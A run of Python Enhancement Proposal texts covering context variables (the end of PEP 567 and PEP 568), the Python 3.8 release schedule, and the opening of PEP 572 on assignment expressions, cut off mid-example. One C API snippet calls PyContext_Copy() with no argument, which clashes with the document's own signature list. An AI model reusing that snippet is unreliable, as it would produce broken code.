    # var.get() == ctx[var] == 'spam'

    var.set('ham')

    # Now, after setting 'var' to 'ham':
    # var.get() == ctx[var] == 'ham'

ctx = copy_context()

# Any changes that the 'main' function makes to 'var'
# will be contained in 'ctx'.
ctx.run(main)

# The 'main()' function was run in the 'ctx' context,
# so changes to 'var' are contained in it:
# ctx[var] == 'ham'

# However, outside of 'ctx', 'var' is still set to 'spam':
# var.get() == 'spam'
Context.run() raises a RuntimeError when called on the same
context object from more than one OS thread, or when called
recursively.
Context.copy() returns a shallow copy of the context object.
Context objects implement the collections.abc.Mapping ABC.
This can be used to introspect contexts:
ctx = contextvars.copy_context()
# Print all context variables and their values in 'ctx':
print(ctx.items())
# Print the value of 'some_variable' in context 'ctx':
print(ctx[some_variable])
Note that all Mapping methods, including Context.__getitem__ and
Context.get, ignore default values for context variables
(i.e. ContextVar.default). This means that for a variable var
that was created with a default value and was not set in the
context:
context[var] raises a KeyError,
var in context returns False,
the variable isn’t included in context.items(), etc.
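A brief illustration of this behaviour (assuming a fresh context and
an illustrative variable name):

var = ContextVar('var', default=42)
ctx = copy_context()

var.get()      # -> 42, found via the ContextVar default
var in ctx     # -> False: the default is not stored in the mapping
# ctx[var]     would raise KeyError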
asyncio
asyncio uses Loop.call_soon(), Loop.call_later(),
and Loop.call_at() to schedule the asynchronous execution of a
function. asyncio.Task uses call_soon() to run the
wrapped coroutine.
We modify Loop.call_{at,later,soon} and
Future.add_done_callback() to accept the new optional context
keyword-only argument, which defaults to the current context:
def call_soon(self, callback, *args, context=None):
    if context is None:
        context = contextvars.copy_context()

    # ... some time later
    context.run(callback, *args)
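A small usage sketch of this default behaviour (it assumes the asyncio
changes described above and a Python 3.7+ event loop; the variable
names are illustrative):

import asyncio
import contextvars

var = contextvars.ContextVar('var', default='unset')

async def main():
    loop = asyncio.get_running_loop()
    var.set('scheduled value')
    # call_soon() captured a copy of the current context, so the
    # callback observes the value that was set before scheduling.
    loop.call_soon(lambda: print(var.get()))   # prints 'scheduled value'
    await asyncio.sleep(0)

asyncio.run(main())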
Tasks in asyncio need to maintain their own context that they inherit
from the point they were created at. asyncio.Task is modified
as follows:
class Task:
    def __init__(self, coro):
        ...
        # Get the current context snapshot.
        self._context = contextvars.copy_context()
        self._loop.call_soon(self._step, context=self._context)

    def _step(self, exc=None):
        ...
        # Every advance of the wrapped coroutine is done in
        # the task's context.
        self._loop.call_soon(self._step, context=self._context)
        ...
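A usage sketch of the resulting behaviour (assumes Python 3.7+ asyncio;
the names are illustrative):

import asyncio
import contextvars

request_id = contextvars.ContextVar('request_id', default=None)

async def handler():
    # The task runs every step in the context copied at creation time.
    print(request_id.get())   # prints 'abc123'

async def main():
    request_id.set('abc123')
    await asyncio.create_task(handler())

asyncio.run(main())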
Implementation
This section explains high-level implementation details in
pseudo-code. Some optimizations are omitted to keep this section
short and clear.
The Context mapping is implemented using an immutable dictionary.
This allows for a O(1) implementation of the copy_context()
function. The reference implementation implements the immutable
dictionary using Hash Array Mapped Tries (HAMT); see PEP 550
for analysis of HAMT performance [1].
For the purposes of this section, we implement an immutable dictionary
using a copy-on-write approach and the built-in dict type:
class _ContextData:

    def __init__(self):
        self._mapping = dict()

    def __getitem__(self, key):
        return self._mapping[key]

    def __contains__(self, key):
        return key in self._mapping

    def __len__(self):
        return len(self._mapping)

    def __iter__(self):
        return iter(self._mapping)

    def set(self, key, value):
        copy = _ContextData()
        copy._mapping = self._mapping.copy()
        copy._mapping[key] = value
        return copy

    def delete(self, key):
        copy = _ContextData()
        copy._mapping = self._mapping.copy()
        del copy._mapping[key]
        return copy
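To illustrate the copy-on-write behaviour of this pseudo-code (purely
for exposition), every set() returns a new mapping while the original
stays unchanged:

d1 = _ContextData()
d2 = d1.set('key', 'value')

# 'd1' is unchanged, 'd2' holds the new entry:
'key' in d1   # -> False
d2['key']     # -> 'value'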
Every OS thread has a reference to the current Context object:
class PyThreadState:
    context: Context
contextvars.Context is a wrapper around _ContextData:
class Context(collections.abc.Mapping):

    _data: _ContextData
    _prev_context: Optional[Context]

    def __init__(self):
        self._data = _ContextData()
        self._prev_context = None

    def run(self, callable, *args, **kwargs):
        if self._prev_context is not None:
            raise RuntimeError(
                f'cannot enter context: {self} is already entered')

        ts: PyThreadState = PyThreadState_Get()
        self._prev_context = ts.context
        try:
            ts.context = self
            return callable(*args, **kwargs)
        finally:
            ts.context = self._prev_context
            self._prev_context = None

    def copy(self):
        new = Context()
        new._data = self._data
        return new

    # Implement abstract Mapping.__getitem__
    def __getitem__(self, var):
        return self._data[var]

    # Implement abstract Mapping.__contains__
    def __contains__(self, var):
        return var in self._data

    # Implement abstract Mapping.__len__
    def __len__(self):
        return len(self._data)

    # Implement abstract Mapping.__iter__
    def __iter__(self):
        return iter(self._data)

    # The rest of the Mapping methods are implemented
    # by collections.abc.Mapping.
contextvars.copy_context() is implemented as follows:
def copy_context():
    ts: PyThreadState = PyThreadState_Get()
    return ts.context.copy()
contextvars.ContextVar interacts with PyThreadState.context
directly:
class ContextVar:

    def __init__(self, name, *, default=_NO_DEFAULT):
        self._name = name
        self._default = default

    @property
    def name(self):
        return self._name

    def get(self, default=_NO_DEFAULT):
        ts: PyThreadState = PyThreadState_Get()
        try:
            return ts.context[self]
        except KeyError:
            pass

        if default is not _NO_DEFAULT:
            return default

        if self._default is not _NO_DEFAULT:
            return self._default

        raise LookupError

    def set(self, value):
        ts: PyThreadState = PyThreadState_Get()
        data: _ContextData = ts.context._data
        try:
            old_value = data[self]
        except KeyError:
            old_value = Token.MISSING

        updated_data = data.set(self, value)
        ts.context._data = updated_data
        return Token(ts.context, self, old_value)

    def reset(self, token):
        if token._used:
            raise RuntimeError("Token has already been used once")

        if token._var is not self:
            raise ValueError(
                "Token was created by a different ContextVar")

        ts: PyThreadState = PyThreadState_Get()
        if token._context is not ts.context:
            raise ValueError(
                "Token was created in a different Context")

        if token._old_value is Token.MISSING:
            ts.context._data = ts.context._data.delete(token._var)
        else:
            ts.context._data = ts.context._data.set(token._var,
                                                    token._old_value)

        token._used = True
Note that in the reference implementation, ContextVar.get()
has an internal cache for the most recent value, which allows it to
bypass a hash lookup. This is similar to the optimization the
decimal module implements to retrieve its context from
PyThreadState_GetDict(). See PEP 550 which explains the
implementation of the cache in great detail.
The Token class is implemented as follows:
class Token:

    MISSING = object()

    def __init__(self, context, var, old_value):
        self._context = context
        self._var = var
        self._old_value = old_value
        self._used = False

    @property
    def var(self):
        return self._var

    @property
    def old_value(self):
        return self._old_value
Summary of the New APIs
Python API
A new contextvars module with ContextVar, Context,
and Token classes, and a copy_context() function.
asyncio.Loop.call_at(), asyncio.Loop.call_later(),
asyncio.Loop.call_soon(), and
asyncio.Future.add_done_callback() run callback functions in
the context they were called in. A new context keyword-only
parameter can be used to specify a custom context.
asyncio.Task is modified internally to maintain its own
context.
C API
PyObject * PyContextVar_New(char *name, PyObject *default):
create a ContextVar object. The default argument can be
NULL, which means that the variable has no default value.
int PyContextVar_Get(PyObject *, PyObject *default_value, PyObject **value):
return -1 if an error occurs during the lookup, 0 otherwise.
If a value for the context variable is found, it will be written to the
value pointer. Otherwise, value will be set to
default_value when it is not NULL. If default_value is
NULL, value will be set to the default value of the
variable, which can be NULL too. value is always a new
reference.
PyObject * PyContextVar_Set(PyObject *, PyObject *):
set the value of the variable in the current context.
PyContextVar_Reset(PyObject *, PyObject *):
reset the value of the context variable.
PyObject * PyContext_New(): create a new empty context.
PyObject * PyContext_Copy(PyObject *): return a shallow
copy of the passed context object.
PyObject * PyContext_CopyCurrent(): get a copy of the current
context.
int PyContext_Enter(PyObject *) and
int PyContext_Exit(PyObject *) allow setting and restoring
the context for the current OS thread. It is required to always
restore the previous context:

PyObject *old_ctx = PyContext_Copy();
if (old_ctx == NULL) goto error;
if (PyContext_Enter(new_ctx)) goto error;

// run some code

if (PyContext_Exit(old_ctx)) goto error;
Rejected Ideas
Replicating threading.local() interface
Please refer to PEP 550 where this topic is covered in detail: [2].
Replacing Token with ContextVar.unset()
The Token API makes it possible to avoid a ContextVar.unset()
method, which would be incompatible with the chained-contexts design
of PEP 550. Future compatibility with PEP 550 is desired
in case there is demand to support context variables in generators
and asynchronous generators.
The Token API also offers better usability: the user does not have
to special-case absence of a value. Compare:
token = cv.set(new_value)
try:
    # cv.get() is new_value
    ...
finally:
    cv.reset(token)
with:
_deleted = object()

old = cv.get(default=_deleted)
try:
    cv.set(blah)
    # code
finally:
    if old is _deleted:
        cv.unset()
    else:
        cv.set(old)
Having Token.reset() instead of ContextVar.reset()
Nathaniel Smith suggested implementing the ContextVar.reset()
method directly on the Token class, so instead of:
token = var.set(value)
# ...
var.reset(token)
we would write:
token = var.set(value)
# ...
token.reset()
Having Token.reset() would make it impossible for a user to
attempt to reset a variable with a token object created by another
variable.
This proposal was rejected because ContextVar.reset() makes it
clearer to the human reader of the code which variable is being
reset.
Making Context objects picklable
Proposed by Antoine Pitrou, this could enable transparent
cross-process use of Context objects, so the
Offloading execution to other threads example would work with
a ProcessPoolExecutor too.
Enabling this is problematic because of the following reasons:
ContextVar objects do not have __module__ and
__qualname__ attributes, making straightforward pickling
of Context objects impossible. This is solvable by modifying
the API to either auto-detect the module where a context variable
is defined, or by adding a new keyword-only “module” parameter
to the ContextVar constructor.
Not all context variables refer to picklable objects. Making a
ContextVar picklable must be an opt-in.
Given the time frame of the Python 3.7 release schedule it was decided
to defer this proposal to Python 3.8.
Making Context a MutableMapping
Making the Context class implement the abc.MutableMapping
interface would mean that it is possible to set and unset variables
using Context[var] = value and del Context[var] operations.
This proposal was deferred to Python 3.8+ because of the following:
If in Python 3.8 it is decided that generators should support
context variables (see PEP 550 and PEP 568), then Context
would be transformed into a chain-map of context variables mappings
(as every generator would have its own mapping). That would make
mutation operations like Context.__delitem__ confusing, as
they would operate only on the topmost mapping of the chain.
Having a single way of mutating the context
(ContextVar.set() and ContextVar.reset() methods) makes
the API more straightforward. For example, it would be non-obvious
why the code fragment below does not work as expected:
var = ContextVar('var')
ctx = copy_context()
ctx[var] = 'value'
print(ctx[var]) # Prints 'value'
print(var.get()) # Raises a LookupError
While the following code would work:
ctx = copy_context()

def func():
    ctx[var] = 'value'

    # Contrary to the previous example, this would work
    # because 'func()' is running within 'ctx'.
    print(ctx[var])
    print(var.get())

ctx.run(func)
If Context was mutable it would mean that context variables
could be mutated separately (or concurrently) from the code that
runs within the context. That would be similar to obtaining a
reference to a running Python frame object and modifying its
f_locals from another OS thread. Having one single way to
assign values to context variables makes contexts conceptually
simpler and more predictable, while keeping the door open for
future performance optimizations.
Having initial values for ContextVars
Nathaniel Smith proposed to have a required initial_value
keyword-only argument for the ContextVar constructor.
The main argument against this proposal is that for some types
there is simply no sensible “initial value” except None.
E.g. consider a web framework that stores the current HTTP
request object in a context variable. With the current semantics
it is possible to create a context variable without a default value:
# Framework:
current_request: ContextVar[Request] = \
    ContextVar('current_request')
# Later, while handling an HTTP request:
request: Request = current_request.get()
# Work with the 'request' object:
return request.method
Note that in the above example there is no need to check if
request is None. It is simply expected that the framework
always sets the current_request variable, or it is a bug (in
which case current_request.get() would raise a LookupError).
If, however, we had a required initial value, we would have
to guard against None values explicitly:
# Framework:
current_request: ContextVar[Optional[Request]] = \
    ContextVar('current_request', initial_value=None)

# Later, while handling an HTTP request:
request: Optional[Request] = current_request.get()

# Check if the current request object was set:
if request is None:
    raise RuntimeError
# Work with the 'request' object:
return request.method
Moreover, we can loosely compare context variables to regular
Python variables and to threading.local() objects. Both
of them raise errors on failed lookups (NameError and
AttributeError respectively).
Backwards Compatibility
This proposal preserves 100% backwards compatibility.
Libraries that use threading.local() to store context-related
values currently work correctly only for synchronous code. Switching
them to use the proposed API will keep their behavior for synchronous
code unmodified, but will automatically enable support for
asynchronous code.
Examples
Converting code that uses threading.local()
A typical code fragment that uses threading.local() usually
looks like the following:
class PrecisionStorage(threading.local):
    # Subclass threading.local to specify a default value.
    value = 0.0

precision = PrecisionStorage()

# To set a new precision:
precision.value = 0.5

# To read the current precision:
print(precision.value)
Such code can be converted to use the contextvars module:
precision = contextvars.ContextVar('precision', default=0.0)
# To set a new precision:
precision.set(0.5)
# To read the current precision:
print(precision.get())
Offloading execution to other threads
It is possible to run code in a separate OS thread using a copy
of the current thread context:
executor = ThreadPoolExecutor()
current_context = contextvars.copy_context()
executor.submit(current_context.run, some_function)
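For instance, a slightly fuller sketch (the variable and function
names are illustrative):

import contextvars
from concurrent.futures import ThreadPoolExecutor

var = contextvars.ContextVar('var', default='spam')
var.set('ham')

def some_function():
    # Runs in a worker thread, but inside a copy of the caller's
    # context, so it sees 'ham' rather than the default.
    return var.get()

with ThreadPoolExecutor() as executor:
    ctx = contextvars.copy_context()
    assert executor.submit(ctx.run, some_function).result() == 'ham'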
Reference Implementation
The reference implementation can be found here: [3].
See also issue 32436 [4].
Acceptance
PEP 567 was accepted by Guido on Monday, January 22, 2018 [5].
The reference implementation was merged on the same day.
References
[1]
PEP 550
[2]
PEP 550
[3]
https://github.com/python/cpython/pull/5027
[4]
https://bugs.python.org/issue32436
[5]
https://mail.python.org/pipermail/python-dev/2018-January/151878.html
[6]
https://bugs.python.org/issue34762
Acknowledgments
I thank Guido van Rossum, Nathaniel Smith, Victor Stinner,
Elvis Pranskevichus, Alyssa Coghlan, Antoine Pitrou, INADA Naoki,
Paul Moore, Eric Snow, Greg Ewing, and many others for their feedback,
ideas, edits, criticism, code reviews, and discussions around
this PEP.
Copyright
This document has been placed in the public domain.
PEP 568 – Generator-sensitivity for Context Variables
Author:
Nathaniel J. Smith <njs at pobox.com>
Status:
Deferred
Type:
Standards Track
Created:
04-Jan-2018
Python-Version:
3.8
Post-History:
Table of Contents
Abstract
Rationale
High-level summary
Specification
Review of PEP 567
Changes from PEP 567 to this PEP
Comparison to PEP 550
Implementation notes
Copyright
Abstract
Context variables provide a generic mechanism for tracking dynamic,
context-local state, similar to thread-local storage but generalized
to work with other kinds of thread-like contexts, such as asyncio
Tasks. PEP 550 proposed a mechanism for context-local state that was
also sensitive to generator context, but this was pretty complicated,
so the BDFL requested it be simplified. The result was PEP 567, which
is targeted for inclusion in 3.7. This PEP then extends PEP 567’s
machinery to add generator context sensitivity.
This PEP is starting out in the “deferred” status, because there isn’t
enough time to give it proper consideration before the 3.7 feature
freeze. The only goal right now is to understand what would be
required to add generator context sensitivity in 3.8, so that we can
avoid shipping something in 3.7 that would rule it out by accident.
(Ruling it out on purpose can wait until 3.8 ;-).)
Rationale
[Currently the point of this PEP is just to understand how this
would work, with discussion of whether it’s a good idea deferred
until after the 3.7 feature freeze. So rationale is TBD.]
High-level summary
Instead of holding a single Context, the threadstate now holds a
ChainMap of Contexts. ContextVar.get and
ContextVar.set are backed by the ChainMap. Generators and
async generators each have an associated Context that they push
onto the ChainMap while they’re running to isolate their
context-local changes from their callers, though this can be
overridden in cases like @contextlib.contextmanager where
“leaking” context changes from the generator into its caller is
desirable.
Specification
Review of PEP 567
Let’s start by reviewing how PEP 567 works, and then in the next
section we’ll describe the differences.
In PEP 567, a Context is a Mapping from ContextVar objects
to arbitrary values. In our pseudo-code here we’ll pretend that it
uses a dict for backing storage. (The real implementation uses a
HAMT, which is semantically equivalent to a dict but with
different performance trade-offs.):
class Context(collections.abc.Mapping):
    def __init__(self):
        self._data = {}
        self._in_use = False

    def __getitem__(self, key):
        return self._data[key]

    def __iter__(self):
        return iter(self._data)

    def __len__(self):
        return len(self._data)
At any given moment, the threadstate holds a current Context
(initialized to an empty Context when the threadstate is created);
we can use Context.run to temporarily switch the current
Context:
# Context.run
def run(self, fn, *args, **kwargs):
    if self._in_use:
        raise RuntimeError("Context already in use")
    tstate = get_thread_state()
    old_context = tstate.current_context
    tstate.current_context = self
    self._in_use = True
    try:
        return fn(*args, **kwargs)
    finally:
        tstate.current_context = old_context
        self._in_use = False
We can fetch a shallow copy of the current Context by calling
copy_context; this is commonly used when spawning a new task, so
that the child task can inherit context from its parent:
def copy_context():
    tstate = get_thread_state()
    new_context = Context()
    new_context._data = dict(tstate.current_context)
    return new_context
In practice, what end users generally work with is ContextVar
objects, which also provide the only way to mutate a Context. They
work with a utility class Token, which can be used to restore a
ContextVar to its previous value:
class Token:
    MISSING = sentinel_value()

    # Note: constructor is private
    def __init__(self, context, var, old_value):
        self._context = context
        self.var = var
        self.old_value = old_value

    # XX: PEP 567 currently makes this a method on ContextVar, but
    # I'm going to propose it switch to this API because it's simpler.
    def reset(self):
        # XX: should we allow token reuse?
        # XX: should we allow tokens to be used if the saved
        # context is no longer active?
        if self.old_value is self.MISSING:
            del self._context._data[self.var]
        else:
            self._context._data[self.var] = self.old_value

# XX: the handling of defaults here uses the simplified proposal from
# https://mail.python.org/pipermail/python-dev/2018-January/151596.html
# This can be updated to whatever we settle on, it was just less
# typing this way :-)
class ContextVar:
    def __init__(self, name, *, default=None):
        self.name = name
        self.default = default

    def get(self):
        context = get_thread_state().current_context
        return context.get(self, self.default)

    def set(self, new_value):
        context = get_thread_state().current_context
        token = Token(context, self, context.get(self, Token.MISSING))
        context._data[self] = new_value
        return token
Changes from PEP 567 to this PEP
In general, Context remains the same. However, now instead of
holding a single Context object, the threadstate stores a stack of
them. This stack acts just like a collections.ChainMap, so we’ll
use that in our pseudocode. Context.run then becomes:
# Context.run
def run(self, fn, *args, **kwargs):
    if self._in_use:
        raise RuntimeError("Context already in use")
    tstate = get_thread_state()
    old_context_stack = tstate.current_context_stack
    tstate.current_context_stack = ChainMap([self])  # changed
    self._in_use = True
    try:
        return fn(*args, **kwargs)
    finally:
        tstate.current_context_stack = old_context_stack
        self._in_use = False
Aside from some updated variable names (e.g.,
tstate.current_context → tstate.current_context_stack), the
only change here is on the marked line, which now wraps the context in
a ChainMap before stashing it in the threadstate.
We also add a Context.push method, which is almost exactly like
Context.run, except that it temporarily pushes the Context
onto the existing stack, instead of temporarily replacing the whole
stack:
# Context.push
def push(self, fn, *args, **kwargs):
    if self._in_use:
        raise RuntimeError("Context already in use")
    tstate = get_thread_state()
    tstate.current_context_stack.maps.insert(0, self)  # different from run
    self._in_use = True
    try:
        return fn(*args, **kwargs)
    finally:
        tstate.current_context_stack.maps.pop(0)  # different from run
        self._in_use = False
In most cases, we don’t expect push to be used directly; instead,
it will be used implicitly by generators. Specifically, every
generator object and async generator object gains a new attribute
.context. When an (async) generator object is created, this
attribute is initialized to an empty Context (self.context =
Context()). This is a mutable attribute; it can be changed by user
code. But trying to set it to anything that isn’t a Context object
or None will raise an error.
Whenever we enter a generator via __next__, send, throw,
or close, or enter an async generator by calling one of those
methods on its __anext__, asend, athrow, or aclose
coroutines, then its .context attribute is checked, and if
non-None, is automatically pushed:
# GeneratorType.__next__
def __next__(self):
    if self.context is not None:
        return self.context.push(self.__real_next__)
    else:
        return self.__real_next__()
While we don’t expect people to use Context.push often, making it
a public API preserves the principle that a generator can always be
rewritten as an explicit iterator class with equivalent semantics.
Also, we modify contextlib.(async)contextmanager to always set its
(async) generator objects’ .context attribute to None:
# contextlib._GeneratorContextManagerBase.__init__
def __init__(self, func, args, kwds):
    self.gen = func(*args, **kwds)
    self.gen.context = None  # added
    ...
This makes sure that code like this continues to work as expected:
@contextmanager
def decimal_precision(prec):
    with decimal.localcontext() as ctx:
        ctx.prec = prec
        yield

with decimal_precision(2):
    ...
The general idea here is that by default, every generator object gets
its own local context, but if users want to explicitly get some other
behavior then they can do that.
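A hypothetical sketch of the proposed semantics (not implemented in
any released Python; shown only to illustrate the intent, with
illustrative names):

var = ContextVar('var', default='outer')

def gen():
    # Under this PEP, the set() below lands in the generator's own
    # Context, which is pushed while the generator runs.
    var.set('inner')
    yield var.get()

g = gen()
next(g)      # -> 'inner'
var.get()    # -> 'outer': the caller's context is unaffected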
Otherwise, things mostly work as before, except that we go through and
swap everything to use the threadstate ChainMap instead of the
threadstate Context. In full detail:
The copy_context function now returns a flattened copy of the
“effective” context. (As an optimization, the implementation might
choose to do this flattening lazily, but if so this will be made
invisible to the user.) Compared to our previous implementation above,
the only change here is that tstate.current_context has been
replaced with tstate.current_context_stack:
def copy_context() -> Context:
    tstate = get_thread_state()
    new_context = Context()
    new_context._data = dict(tstate.current_context_stack)
    return new_context
Token is unchanged, and the changes to ContextVar.get are
trivial:
# ContextVar.get
def get(self):
    context_stack = get_thread_state().current_context_stack
    return context_stack.get(self, self.default)
ContextVar.set is a little more interesting: instead of going
through the ChainMap machinery like everything else, it always
mutates the top Context in the stack, and – crucially! – sets up
the returned Token to restore its state later. This allows us to
avoid accidentally “promoting” values between different levels in the
stack, as would happen if we did old = var.get(); ...;
var.set(old):
# ContextVar.set
def set(self, new_value):
    top_context = get_thread_state().current_context_stack.maps[0]
    token = Token(top_context, self, top_context.get(self, Token.MISSING))
    top_context._data[self] = new_value
    return token
And finally, to allow for introspection of the full context stack, we
provide a new function contextvars.get_context_stack:
def get_context_stack() -> List[Context]:
    return list(get_thread_state().current_context_stack.maps)
That’s all.
Comparison to PEP 550
The main difference from PEP 550 is that it reified what we’re calling
“contexts” and “context stacks” as two different concrete types
(LocalContext and ExecutionContext respectively). This led to
lots of confusion about what the differences were, and which object
should be used in which places. This proposal simplifies things by
only reifying the Context, which is “just a dict”, and makes the
“context stack” an unnamed feature of the interpreter’s runtime state
– though it is still possible to introspect it using
get_context_stack, for debugging and other purposes.
Implementation notes
Context will continue to use a HAMT-based mapping structure under
the hood instead of dict, since we expect that calls to
copy_context are much more common than ContextVar.set. In
almost all cases, copy_context will find that there’s only one
Context in the stack (because it’s rare for generators to spawn
new tasks), and can simply re-use it directly; in other cases HAMTs
are cheap to merge and this can be done lazily.
Rather than using an actual ChainMap object, we’ll represent the
context stack using some appropriate structure – the most appropriate
options are probably either a bare list with the “top” of the
stack being the end of the list so we can use push/pop, or
else an intrusive linked list (PyThreadState → Context →
Context → …), with the “top” of the stack at the beginning of
the list to allow efficient push/pop.
A critical optimization in PEP 567 is the caching of values inside
ContextVar. Switching from a single context to a context stack
makes this a little bit more complicated, but not too much. Currently,
we invalidate the cache whenever the threadstate’s current Context
changes (on thread switch, and when entering/exiting Context.run).
The simplest approach here would be to invalidate the cache whenever
stack changes (on thread switch, when entering/exiting
Context.run, and when entering/leaving Context.push). The main
effect of this is that iterating a generator will invalidate the
cache. It seems unlikely that this will cause serious problems, but if
it does, then I think it can be avoided with a cleverer cache key that
recognizes that pushing and then popping a Context returns the
threadstate to its previous state. (Idea: store the cache key for a
particular stack configuration in the topmost Context.)
It seems unavoidable in this design that uncached get will be
O(n), where n is the size of the context stack. However, n will
generally be very small – it’s roughly the number of nested
generators, so usually n=1, and it will be extremely rare to see n
greater than, say, 5. At worst, n is bounded by the recursion limit.
In addition, we can expect that in most cases of deep generator
recursion, most of the Contexts in the stack will be empty, and
thus can be skipped extremely quickly during lookup. And for repeated
lookups the caching mechanism will kick in. So it’s probably possible
to construct some extreme case where this causes performance problems,
but ordinary code should be essentially unaffected.
Copyright
This document has been placed in the public domain.
PEP 569 – Python 3.8 Release Schedule
Author:
Łukasz Langa <lukasz at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
27-Jan-2018
Python-Version:
3.8
Table of Contents
Abstract
Release Manager and Crew
3.8 Lifespan
Release Schedule
3.8.0 schedule
Bugfix releases
Source-only security fix releases
Features for 3.8
Copyright
Abstract
This document describes the development and release schedule for
Python 3.8. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.8 Release Manager: Łukasz Langa
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
3.8 Lifespan
3.8 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.9.0 final,
the ninth and final 3.8 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.8 final, so until approximately
October 2024.
Release Schedule
3.8.0 schedule
3.8 development begins: Monday, 2018-01-29
3.8.0 alpha 1: Sunday, 2019-02-03
3.8.0 alpha 2: Monday, 2019-02-25
3.8.0 alpha 3: Monday, 2019-03-25
3.8.0 alpha 4: Monday, 2019-05-06
3.8.0 beta 1: Tuesday, 2019-06-04
(No new features beyond this point.)
3.8.0 beta 2: Thursday, 2019-07-04
3.8.0 beta 3: Monday, 2019-07-29
3.8.0 beta 4: Friday, 2019-08-30
3.8.0 candidate 1: Tuesday, 2019-10-01
3.8.0 final: Monday, 2019-10-14
Bugfix releases
3.8.1rc1: Tuesday, 2019-12-10
3.8.1: Wednesday, 2019-12-18
3.8.2rc1: Monday, 2020-02-10
3.8.2rc2: Monday, 2020-02-17
3.8.2: Monday, 2020-02-24
3.8.3rc1: Wednesday, 2020-04-29
3.8.3: Wednesday, 2020-05-13
3.8.4rc1: Tuesday, 2020-06-30
3.8.4: Monday, 2020-07-13
3.8.5: Monday, 2020-07-20 (security hotfix)
3.8.6rc1: Tuesday, 2020-09-08
3.8.6: Thursday, 2020-09-24
3.8.7rc1: Monday, 2020-12-07
3.8.7: Monday, 2020-12-21
3.8.8rc1: Tuesday, 2021-02-16
3.8.8: Friday, 2021-02-19
3.8.9: Friday, 2021-04-02 (security hotfix)
3.8.10: Monday, 2021-05-03 (final regular bugfix release with binary
installers)
Source-only security fix releases
Provided irregularly on an “as-needed” basis until October 2024.
3.8.11: Monday, 2021-06-28
3.8.12: Monday, 2021-08-30
3.8.13: Wednesday, 2022-03-16
3.8.14: Tuesday, 2022-09-06
3.8.15: Tuesday, 2022-10-11
3.8.16: Tuesday, 2022-12-06
3.8.17: Tuesday, 2023-06-06
3.8.18: Thursday, 2023-08-24
Features for 3.8
Some of the notable features of Python 3.8 include:
PEP 570, Positional-only arguments
PEP 572, Assignment Expressions
PEP 574, Pickle protocol 5 with out-of-band data
PEP 578, Runtime audit hooks
PEP 587, Python Initialization Configuration
PEP 590, Vectorcall: a fast calling protocol for CPython
Typing-related: PEP 591 (Final qualifier), PEP 586 (Literal types),
and PEP 589 (TypedDict)
Parallel filesystem cache for compiled bytecode
Debug builds share the ABI with release builds
f-strings support a handy = specifier for debugging
continue is now legal in finally: blocks
on Windows, the default asyncio event loop is now
ProactorEventLoop
on macOS, the spawn start method is now used by default in
multiprocessing
multiprocessing can now use shared memory segments to avoid
pickling costs between processes
typed_ast is merged back to CPython
LOAD_GLOBAL is now 40% faster
pickle now uses Protocol 4 by default, improving performance
There are many other interesting changes, please consult the
“What’s New” page in the documentation for a full list.
Copyright
This document has been placed in the public domain.
PEP 572 – Assignment Expressions
Author:
Chris Angelico <rosuav at gmail.com>, Tim Peters <tim.peters at gmail.com>,
Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Created:
28-Feb-2018
Python-Version:
3.8
Post-History:
28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018,
25-Apr-2018, 09-Jul-2018, 05-Aug-2019
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
The importance of real code
Syntax and semantics
Exceptional cases
Scope of the target
Relative precedence of :=
Change to evaluation order
Differences between assignment expressions and assignment statements
Specification changes during implementation
Examples
Examples from the Python standard library
site.py
_pydecimal.py
copy.py
datetime.py
sysconfig.py
Simplifying list comprehensions
Capturing condition values
Fork
Rejected alternative proposals
Changing the scope rules for comprehensions
Alternative spellings
Special-casing conditional statements
Special-casing comprehensions
Lowering operator precedence
Allowing commas to the right
Always requiring parentheses
Frequently Raised Objections
Why not just turn existing assignment into an expression?
With assignment expressions, why bother with assignment statements?
Why not use a sublocal scope and prevent namespace pollution?
Style guide recommendations
Acknowledgements
Appendix A: Tim Peters’s findings
A numeric example
Appendix B: Rough code translations for comprehensions
Appendix C: No Changes to Scope Semantics
References
Copyright
Abstract
This is a proposal for creating a way to assign to variables within an
expression using the notation NAME := expr.
As part of this change, there is also an update to dictionary comprehension
evaluation order to ensure key expressions are executed before value
expressions (allowing the key to be bound to a name and then re-used as part of
calculating the corresponding value).
During discussion of this PEP, the operator became informally known as
“the walrus operator”. The construct’s formal name is “Assignment Expressions”
(as per the PEP title), but they may also be referred to as “Named Expressions”
(e.g. the CPython reference implementation uses that name internally).
Rationale
Naming the result of an expression is an important part of programming,
allowing a descriptive name to be used in place of a longer expression,
and permitting reuse. Currently, this feature is available only in
statement form, making it unavailable in list comprehensions and other
expression contexts.
Additionally, naming sub-parts of a large expression can assist an interactive
debugger, providing useful display hooks and partial results. Without a way to
capture sub-expressions inline, this would require refactoring of the original
code; with assignment expressions, this merely requires the insertion of a few
name := markers. Removing the need to refactor reduces the likelihood that
the code be inadvertently changed as part of debugging (a common cause of
Heisenbugs), and is easier to dictate to another programmer.
The importance of real code
During the development of this PEP many people (supporters and critics
both) have had a tendency to focus on toy examples on the one hand,
and on overly complex examples on the other.
The danger of toy examples is twofold: they are often too abstract to
make anyone go “ooh, that’s compelling”, and they are easily refuted
with “I would never write it that way anyway”.
The danger of overly complex examples is that they provide a
convenient strawman for critics of the proposal to shoot down (“that’s
obfuscated”).
Yet there is some use for both extremely simple and extremely complex
examples: they are helpful to clarify the intended semantics.
Therefore, there will be some of each below.
However, in order to be compelling, examples should be rooted in
real code, i.e. code that was written without any thought of this PEP,
as part of a useful application, however large or small. Tim Peters
has been extremely helpful by going over his own personal code
repository and picking examples of code he had written that (in his
view) would have been clearer if rewritten with (sparing) use of
assignment expressions. His conclusion: the current proposal would
have allowed a modest but clear improvement in quite a few bits of
code.
Another use of real code is to observe indirectly how much value
programmers place on compactness. Guido van Rossum searched through a
Dropbox code base and discovered some evidence that programmers value
writing fewer lines over shorter lines.
Case in point: Guido found several examples where a programmer
repeated a subexpression, slowing down the program, in order to save
one line of code, e.g. instead of writing:
match = re.match(data)
group = match.group(1) if match else None
they would write:
group = re.match(data).group(1) if re.match(data) else None
Another example illustrates that programmers sometimes do more work to
save an extra level of indentation:
match1 = pattern1.match(data)
